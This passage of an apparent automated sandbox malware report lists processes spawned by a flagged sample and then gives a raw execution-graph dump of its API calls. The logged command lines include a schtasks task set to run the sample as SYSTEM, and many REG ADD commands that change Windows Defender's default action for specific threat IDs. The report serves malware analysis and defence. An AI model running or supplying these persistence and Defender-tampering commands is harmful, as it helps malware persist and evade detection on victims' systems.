                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:28
                            Start time:19:04:14
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F
                            Imagebase:0x1160000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:29
                            Start time:19:04:15
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:30
                            Start time:19:04:16
                            Start date:24/11/2022
                            Path:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S
                            Imagebase:0x1090000
                            File size:7104512 bytes
                            MD5 hash:893793FBD70BA4A92919D09205D6C9C1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 51%, ReversingLabs

                            General

                            Target ID:31
                            Start time:19:04:17
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                            Imagebase:0xe50000
                            File size:430592 bytes
                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Target ID:32
                            Start time:19:04:18
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:33
                            Start time:19:04:25
                            Start date:24/11/2022
                            Path:C:\Windows\System32\gpupdate.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\system32\gpupdate.exe" /force
                            Imagebase:0x7ff70abd0000
                            File size:29184 bytes
                            MD5 hash:47C68FE26B0188CDD80F744F7405FF26
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:34
                            Start time:19:04:26
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:37
                            Start time:19:04:27
                            Start date:24/11/2022
                            Path:C:\Windows\System32\gpscript.exe
                            Wow64 process (32bit):false
                            Commandline:gpscript.exe /RefreshSystemParam
                            Imagebase:0x7ff66dce0000
                            File size:44544 bytes
                            MD5 hash:C48CBDC676E442BAF58920C5B7E556DE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:38
                            Start time:19:04:51
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:39
                            Start time:19:04:51
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:40
                            Start time:19:04:52
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:41
                            Start time:19:04:53
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:42
                            Start time:19:04:53
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:43
                            Start time:19:04:54
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:44
                            Start time:19:04:54
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:45
                            Start time:19:04:54
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:46
                            Start time:19:04:55
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:47
                            Start time:19:04:56
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:48
                            Start time:19:04:56
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:49
                            Start time:19:04:57
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:50
                            Start time:19:04:57
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:51
                            Start time:19:04:58
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:53
                            Start time:19:04:58
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:15%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:2.3%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:44
                              execution_graph 13092 411160 13095 413f9f 13092->13095 13096 411166 13095->13096 13097 413fcd 13095->13097 13098 414012 13097->13098 13099 413fd7 13097->13099 13100 414003 13098->13100 13103 41570a ctype 28 API calls 13098->13103 13112 41570a 13099->13112 13100->13096 13102 41406b RtlFreeHeap 13100->13102 13102->13096 13107 41401e ctype 13103->13107 13104 413fde ctype 13105 413ff8 13104->13105 13127 415ac8 13104->13127 13133 414009 13105->13133 13111 41404a 13107->13111 13136 41684f 13107->13136 13140 414061 13111->13140 13113 415760 EnterCriticalSection 13112->13113 13114 415722 13112->13114 13113->13104 13143 413e65 13114->13143 13117 415738 13119 41570a ctype 27 API calls 13117->13119 13120 415740 13119->13120 13121 415751 13120->13121 13122 415747 InitializeCriticalSection 13120->13122 13124 413f9f ctype 27 API calls 13121->13124 13123 415756 13122->13123 13152 41576b LeaveCriticalSection 13123->13152 13124->13123 13126 41575e 13126->13113 13128 415b06 13127->13128 13132 415dbc ctype 13127->13132 13129 415d02 VirtualFree 13128->13129 13128->13132 13130 415d66 13129->13130 13131 415d75 VirtualFree HeapFree 13130->13131 13130->13132 13131->13132 13132->13105 13236 41576b LeaveCriticalSection 13133->13236 13135 414010 13135->13100 13137 41687c 13136->13137 13139 416892 13136->13139 13137->13139 13237 416736 13137->13237 13139->13111 13246 41576b LeaveCriticalSection 13140->13246 13142 414068 13142->13100 13153 413e77 13143->13153 13146 414c0c 13147 414c15 13146->13147 13148 414c1a 13146->13148 13216 4177fd 13147->13216 13222 417836 13148->13222 13152->13126 13154 413e74 13153->13154 13156 413e7e ctype 13153->13156 13154->13117 13154->13146 13156->13154 13157 413ea3 13156->13157 13158 413ed0 13157->13158 13159 413f13 13157->13159 13160 41570a ctype 28 API calls 13158->13160 13163 413efe 13158->13163 13159->13163 13164 413f35 13159->13164 13161 413ee6 13160->13161 13175 415df1 13161->13175 13162 413f82 RtlAllocateHeap 13166 413f05 13162->13166 13163->13162 13163->13166 13167 41570a ctype 28 API calls 13164->13167 13166->13156 13169 413f3c 13167->13169 13184 416894 13169->13184 13172 413f4f 13191 413f69 13172->13191 13178 415e23 13175->13178 13176 415ec2 13180 413ef1 13176->13180 13201 4161ab 13176->13201 13178->13176 13178->13180 13194 4160fa 13178->13194 13181 413f0a 13180->13181 13205 41576b LeaveCriticalSection 13181->13205 13183 413f11 13183->13163 13185 4168a2 ctype 13184->13185 13186 416a63 13185->13186 13187 41698e VirtualAlloc 13185->13187 13190 41695f ctype 13185->13190 13206 41659c 13186->13206 13187->13190 13190->13172 13215 41576b LeaveCriticalSection 13191->13215 13193 413f5c 13193->13163 13193->13166 13195 41613d HeapAlloc 13194->13195 13196 41610d HeapReAlloc 13194->13196 13197 41618d 13195->13197 13199 416163 VirtualAlloc 13195->13199 13196->13197 13198 41612c 13196->13198 13197->13176 13198->13195 13199->13197 13200 41617d HeapFree 13199->13200 13200->13197 13202 4161bd VirtualAlloc 13201->13202 13204 416206 13202->13204 13204->13180 13205->13183 13207 4165b0 HeapAlloc 13206->13207 13208 4165a9 13206->13208 13209 4165cd VirtualAlloc 13207->13209 13210 416605 ctype 13207->13210 13208->13209 13211 4166c2 13209->13211 13212 4165ed VirtualAlloc 13209->13212 13210->13190 13211->13210 13213 4166ca HeapFree 13211->13213 13212->13210 13214 4166b4 VirtualFree 13212->13214 13213->13210 13214->13211 13215->13193 13217 417807 13216->13217 13218 417834 13217->13218 13219 417836 ctype 7 API calls 13217->13219 13218->13148 13220 41781e 13219->13220 13221 417836 ctype 7 API calls 13220->13221 13221->13218 13225 417849 13222->13225 13223 414c23 13223->13117 13224 417960 ctype 13228 417973 GetStdHandle WriteFile 13224->13228 13225->13223 13225->13224 13226 417889 13225->13226 13226->13223 13227 417895 GetModuleFileNameA 13226->13227 13229 4178ad ctype 13227->13229 13228->13223 13231 418320 13229->13231 13232 41832d LoadLibraryA 13231->13232 13234 41836f 13231->13234 13233 41833e GetProcAddress 13232->13233 13232->13234 13233->13234 13235 418355 GetProcAddress GetProcAddress 13233->13235 13234->13223 13235->13234 13236->13135 13240 416743 13237->13240 13238 4167f3 13238->13139 13239 416764 VirtualFree 13239->13240 13240->13238 13240->13239 13242 4166e0 VirtualFree 13240->13242 13243 4166fd 13242->13243 13244 41672d 13243->13244 13245 41670d HeapFree 13243->13245 13244->13240 13245->13240 13246->13142 13247 414b04 GetVersion 13278 4159f8 HeapCreate 13247->13278 13249 414b62 13250 414b67 13249->13250 13251 414b6f 13249->13251 13683 414c31 13250->13683 13290 4154bc 13251->13290 13255 414b74 13256 414b80 13255->13256 13257 414b78 13255->13257 13300 417641 13256->13300 13259 414c31 8 API calls 13257->13259 13261 414b7f 13259->13261 13260 414b8a GetCommandLineA 13314 41750f 13260->13314 13261->13256 13265 414ba4 13346 417209 13265->13346 13267 414ba9 13268 414bae GetStartupInfoA 13267->13268 13359 4171b1 13268->13359 13270 414bc0 GetModuleHandleA 13363 401014 13270->13363 13279 415a18 13278->13279 13280 415a4e 13278->13280 13697 4158b0 13279->13697 13280->13249 13283 415a34 13286 415a51 13283->13286 13288 41659c ctype 5 API calls 13283->13288 13284 415a27 13709 415a55 HeapAlloc 13284->13709 13286->13249 13287 415a31 13287->13286 13289 415a42 HeapDestroy 13287->13289 13288->13287 13289->13280 13810 4156e1 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 13290->13810 13292 4154c2 TlsAlloc 13293 4154d2 13292->13293 13294 41550c 13292->13294 13295 416efc 30 API calls 13293->13295 13294->13255 13296 4154db 13295->13296 13296->13294 13297 4154e3 TlsSetValue 13296->13297 13297->13294 13298 4154f4 13297->13298 13299 4154fa GetCurrentThreadId 13298->13299 13299->13255 13301 413e65 ctype 29 API calls 13300->13301 13302 417654 13301->13302 13303 417662 GetStartupInfoA 13302->13303 13304 414c0c ctype 7 API calls 13302->13304 13306 417781 13303->13306 13307 4176b0 13303->13307 13304->13303 13308 4177ac GetStdHandle 13306->13308 13309 4177ec SetHandleCount 13306->13309 13307->13306 13310 413e65 ctype 29 API calls 13307->13310 13312 417727 13307->13312 13308->13306 13311 4177ba GetFileType 13308->13311 13309->13260 13310->13307 13311->13306 13312->13306 13313 417749 GetFileType 13312->13313 13313->13312 13315 41752a GetEnvironmentStringsW 13314->13315 13316 41755d 13314->13316 13318 417532 13315->13318 13319 41753e GetEnvironmentStrings 13315->13319 13317 41754e 13316->13317 13316->13318 13320 414b9a 13317->13320 13322 4175f0 GetEnvironmentStrings 13317->13322 13324 4175fc 13317->13324 13321 41756a GetEnvironmentStringsW 13318->13321 13325 417576 WideCharToMultiByte 13318->13325 13319->13317 13319->13320 13337 4172c2 13320->13337 13321->13320 13321->13325 13322->13320 13322->13324 13328 413e65 ctype 29 API calls 13324->13328 13326 4175aa 13325->13326 13327 4175dc FreeEnvironmentStringsW 13325->13327 13329 413e65 ctype 29 API calls 13326->13329 13327->13320 13335 417617 13328->13335 13330 4175b0 13329->13330 13330->13327 13331 4175b9 WideCharToMultiByte 13330->13331 13333 4175d3 13331->13333 13334 4175ca 13331->13334 13332 41762d FreeEnvironmentStringsA 13332->13320 13333->13327 13336 413f9f ctype 29 API calls 13334->13336 13335->13332 13336->13333 13338 4172d4 13337->13338 13339 4172d9 GetModuleFileNameA 13337->13339 13811 418212 13338->13811 13341 4172fc 13339->13341 13342 413e65 ctype 29 API calls 13341->13342 13343 41731d 13342->13343 13344 41732d 13343->13344 13345 414c0c ctype 7 API calls 13343->13345 13344->13265 13345->13344 13347 417216 13346->13347 13350 41721b ctype 13346->13350 13348 418212 48 API calls 13347->13348 13348->13350 13349 413e65 ctype 29 API calls 13351 417248 13349->13351 13350->13349 13352 414c0c ctype 7 API calls 13351->13352 13358 41725c ctype 13351->13358 13352->13358 13353 41729f 13354 413f9f ctype 29 API calls 13353->13354 13355 4172ab 13354->13355 13355->13267 13356 413e65 ctype 29 API calls 13356->13358 13357 414c0c ctype 7 API calls 13357->13358 13358->13353 13358->13356 13358->13357 13360 4171ba 13359->13360 13362 4171bf 13359->13362 13361 418212 48 API calls 13360->13361 13361->13362 13362->13270 13840 401a51 GetVersionExA 13363->13840 13368 402170 30 API calls 13369 401067 13368->13369 13370 402170 30 API calls 13369->13370 13371 401079 13370->13371 13372 402170 30 API calls 13371->13372 13373 40108b GetCommandLineW 13372->13373 13848 401c80 13373->13848 13380 402170 30 API calls 13381 4010c7 13380->13381 13865 4045e2 13381->13865 13388 401c80 30 API calls 13389 4010f5 13388->13389 13897 401e3a 13389->13897 13394 403a9c ctype 29 API calls 13395 401118 13394->13395 13396 403a9c ctype 29 API calls 13395->13396 13397 401120 13396->13397 13398 40115a 13397->13398 14014 401e19 13397->14014 13904 40243e 13398->13904 13405 401182 13407 401186 13405->13407 13408 40119f 13405->13408 13406 401141 13409 403a9c ctype 29 API calls 13406->13409 13410 401197 13407->13410 14021 411093 MessageBoxW 13407->14021 13411 401c80 30 API calls 13408->13411 13412 401149 13409->13412 13417 403a9c ctype 29 API calls 13410->13417 13414 4011af 13411->13414 13415 40235e 30 API calls 13412->13415 13416 402170 30 API calls 13414->13416 13418 401152 13415->13418 13425 4011c1 13416->13425 13419 4019cc 13417->13419 13420 402323 30 API calls 13418->13420 13422 403a9c ctype 29 API calls 13419->13422 13420->13398 13421 4014b1 13917 401ecd 13421->13917 13423 4019d4 13422->13423 13426 403a9c ctype 29 API calls 13423->13426 13425->13421 14022 403d5a 13425->14022 13430 4019dc 13426->13430 13433 403a9c ctype 29 API calls 13430->13433 13434 4019e4 13433->13434 13440 403a9c ctype 29 API calls 13434->13440 13435 4014f0 13925 403a76 13435->13925 13436 4014d7 13441 4014e8 13436->13441 14066 411093 MessageBoxW 13436->14066 13437 401212 13442 401c80 30 API calls 13437->13442 13438 4011f9 13439 40120a 13438->13439 14049 411093 MessageBoxW 13438->14049 14057 4042d6 13439->14057 13445 4019ec 13440->13445 13448 401a2d 36 API calls 13441->13448 13447 40121f 13442->13447 13449 403a9c ctype 29 API calls 13445->13449 14050 404073 13447->14050 13452 4019a3 13448->13452 13634 401395 13449->13634 13455 403a9c ctype 29 API calls 13452->13455 13461 4019ae 13455->13461 13456 403a9c ctype 29 API calls 13462 401239 13456->13462 13457 4014f7 13930 408107 13457->13930 13459 40134f 13463 403a9c ctype 29 API calls 13459->13463 13465 403a9c ctype 29 API calls 13461->13465 13466 401c80 30 API calls 13462->13466 13467 401357 13463->13467 13470 4019b6 13465->13470 13471 401248 13466->13471 13472 403a9c ctype 29 API calls 13467->13472 13468 40152a 14067 411093 MessageBoxW 13468->14067 13469 40153b 13940 401a03 13469->13940 13474 403a9c ctype 29 API calls 13470->13474 13476 404073 30 API calls 13471->13476 13477 401362 13472->13477 13474->13410 13479 40125a 13476->13479 13480 403a9c ctype 29 API calls 13477->13480 13482 403a9c ctype 29 API calls 13479->13482 13483 40136a 13480->13483 13481 402170 30 API calls 13484 401562 13481->13484 13485 401262 13482->13485 13487 403a9c ctype 29 API calls 13483->13487 13943 402f15 13484->13943 13486 401c80 30 API calls 13485->13486 13489 401271 13486->13489 13490 401372 13487->13490 13492 404073 30 API calls 13489->13492 13493 403a9c ctype 29 API calls 13490->13493 13497 401286 13492->13497 13498 40137a 13493->13498 13494 401585 13499 4015f0 13494->13499 13503 4015b6 13494->13503 14068 40602f 13494->14068 13495 4015f9 13496 403a9c ctype 29 API calls 13495->13496 13500 401601 13496->13500 13501 403a9c ctype 29 API calls 13497->13501 13502 403a9c ctype 29 API calls 13498->13502 13507 403a9c ctype 29 API calls 13499->13507 13505 401ecd 30 API calls 13500->13505 13506 40128e 13501->13506 13508 401382 13502->13508 13503->13499 13521 40602f 33 API calls 13503->13521 13510 40160a 13505->13510 13511 403b4f ctype 5 API calls 13506->13511 13512 4018bc 13507->13512 13513 403a9c ctype 29 API calls 13508->13513 13985 405033 13510->13985 13516 40129f 13511->13516 13517 403a9c ctype 29 API calls 13512->13517 13518 40138a 13513->13518 13514 401d7a 30 API calls 13519 4015ab 13514->13519 13527 401c80 30 API calls 13516->13527 13522 4018c7 13517->13522 13523 403a9c ctype 29 API calls 13518->13523 13524 403a9c ctype 29 API calls 13519->13524 13520 401612 SetCurrentDirectoryA 13525 401651 13520->13525 13526 401624 SetCurrentDirectoryA 13520->13526 13528 4015d6 MessageBoxW 13521->13528 14099 401a2d 13522->14099 13523->13634 13524->13503 13529 40165a 13525->13529 13530 40172c 13525->13530 13532 403a9c ctype 29 API calls 13526->13532 13533 4012b6 13527->13533 13534 403a9c ctype 29 API calls 13528->13534 13535 401a18 31 API calls 13529->13535 13537 401787 13530->13537 14075 401d1b 13530->14075 13538 401631 13532->13538 13549 403a9c ctype 29 API calls 13533->13549 13534->13499 13539 401665 13535->13539 13536 4018de 13540 403a9c ctype 29 API calls 13536->13540 13990 401ce1 